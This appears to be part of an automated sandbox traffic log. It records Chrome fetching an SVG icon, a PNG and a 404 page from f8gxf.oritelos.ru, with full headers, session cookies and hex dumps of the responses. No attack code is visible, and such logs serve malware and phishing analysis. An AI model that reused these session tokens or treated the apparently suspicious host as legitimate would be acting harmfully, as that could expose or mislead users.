                                                2024-05-30 10:21:15 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:15 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:15 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:15 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:15 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:15 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:15 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:15 UTC79INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                Data Ascii: @ @ @ @ @ @ @ @ @


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                62192.168.2.449813188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:14 UTC1124OUTGET /opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd199 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:15 UTC661INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:15 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="opjc6DkU8Xus4dQkMciD0UZh1ELijK7hhF1rdvmX5P87aPDjO8cXDnccd199"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZYPLLrI83D8vMufGI51KgHyc0ywXzgAwBUleQuWwVMDfxuo3yZl4I%2B1nCf%2FguF2MKQbyf6atlMzyrFX2zjybIvfxmoviqOOK9xIFYi6v1QDbgWtXseE8vVoFUbk8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff07485141e7-EWR
                                                2024-05-30 10:21:15 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                2024-05-30 10:21:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                63192.168.2.449814188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:14 UTC1119OUTGET /hxfrw2DYZZsbHnkjqki9TmQkIfk5jufh48quUrIdw3ZYHOkO6r3Yenb HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:15 UTC583INHTTP/1.1 404 Not Found
                                                Date: Thu, 30 May 2024 10:21:15 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wl%2Faqn%2BESHa7SHqMjq3OZvf6PFn0srrY9bSWXN%2BNc2Y3XL3Q5JmGgZzVk020d%2FTb2Eb629Uc%2FPgURLwvoClWNIF7dcUUdSgAMbGcGhFfqrQikK3Is8o3ouaQCBalAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff08cfa18c51-EWR
                                                2024-05-30 10:21:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                64192.168.2.449815188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:15 UTC1122OUTGET /gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM12207 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:16 UTC650INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:16 GMT
                                                Content-Type: image/png
                                                Content-Length: 49602
                                                Connection: close
                                                Content-Disposition: inline; filename="gh1gydCOQHeK528mngVzAiLyskljmHjdzQL3GdvjGBKvpweXkiITM12207"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=erbeEEpW8YGv%2FMas8rmmzKyeqgV07q1Bj8cMLqxAuULgg7iXyC3k4y8qveX29oXmH9Of%2Fgj3XXEuH970XR058axRrlwI38yL0jMNqVTAEpr2mDk4euUdcHtr3EJwLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff0c4edf8c7d-EWR
                                                2024-05-30 10:21:16 UTC719INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                2024-05-30 10:21:16 UTC1369INData Raw: 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3 24 e2 27 53 ad d6 6a 02 70 01
                                                Data Ascii: egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$$'Sjp
                                                2024-05-30 10:21:16 UTC1369INData Raw: 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd 4d 07 fe 45 7a e2 fc 59 e0 15
                                                Data Ascii: IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:HMEzY
                                                2024-05-30 10:21:16 UTC1369INData Raw: 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2 eb bb c0 e0 4c 63 a6 ea d8 01
                                                Data Ascii: $I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0Lc
                                                2024-05-30 10:21:16 UTC1369INData Raw: d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba cd 59 c4 5f 7f ed d6 f6 d9 47
                                                Data Ascii: V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\Y_G
                                                2024-05-30 10:21:16 UTC1369INData Raw: d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26 e3 e4 ad 94 c3 5b 89 bf 9e 5b
                                                Data Ascii: !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&[[
